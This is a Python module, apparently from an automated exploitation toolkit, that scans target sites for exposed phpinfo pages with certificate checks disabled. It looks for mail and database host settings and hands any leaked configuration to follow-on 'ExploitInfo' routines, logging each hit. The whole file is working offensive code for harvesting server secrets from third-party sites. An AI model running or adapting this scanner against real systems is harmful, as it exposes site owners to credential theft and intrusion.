# cython: language_level=3


import threading
import urllib3
import requests
import src.utils.generics.generic as UtilsGenerics
from config.params import ConfigConst
from src.vulnerability.disclosure.common.extract_info_2 import Extact_info_Common_2
from src.vulnerability.services.exploit_info import ExploitInfo

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class ExploitPhpInfoVuln:
    def __init__(self):
        self.PHP_LOCATION = [
            "/phpinfo",
            "/phpinfo.php",
            "/_profiler/phpinfo",
            "/?phpinfo=1",
        ]
        self.KEY_TO_FIND = ["REDIRECT_MAIL_HOST", "MAIL_HOST", "DB_HOST"]
        self.logger_vuln = UtilsGenerics.setup_logging(
            logger_name=f"{ConfigConst.LoggingConfig.LOGGER_VULN_NAME}",
            log_file=ConfigConst.LoggingConfig.VULN_LOG_FILE_PATH,
        )
        self.file_lock = threading.Lock()
        self.RESULT_VULN = ConfigConst.CommonPathConfig.RESULT_VULN
        self.exploit_info = ExploitInfo()
        self.exploit_info_yii = Extact_info_Common_2()

    def run(self, url, session):
        found_phpinfo = []
        success = False
        for phpinfo_loc in self.PHP_LOCATION:
            try:
                response_redi_false = session.get(
                    f"{url}{phpinfo_loc}",
                    timeout=10,
                    allow_redirects=False,
                    verify=False,
                ).text
                if any(keyword in response_redi_false for keyword in self.KEY_TO_FIND):
                    found_phpinfo.append(f"{url}{phpinfo_loc}")
                    success_exploit_info = self.exploit_info.run(
                        self.exploit_info_yii.run(response_redi_false),
                        url,
                        f"{url}{phpinfo_loc}",
                        session,
                    )
                    if success_exploit_info:
                        success = True
            except requests.ConnectionError as e:
                break
            except requests.Timeout:
                break
            except requests.RequestException as e:
                if hasattr(e, "response") and e.response:
                    if e.response.is_redirect:
                        continue
                    else:
                        self.logger_vuln.error(
                            f"ExploitPhpInfoVuln - DEBUG error : {e} with url : {url}"
                        )
                        continue
            except Exception as e:
                self.logger_vuln.error(
                    f"ExploitPhpInfoVuln - DEBUG error : {e} with url : {url}"
                )
                continue

        if found_phpinfo:
            for link in found_phpinfo:
                UtilsGenerics.push_result(self, self.RESULT_VULN, f"{link}\n")
        return success
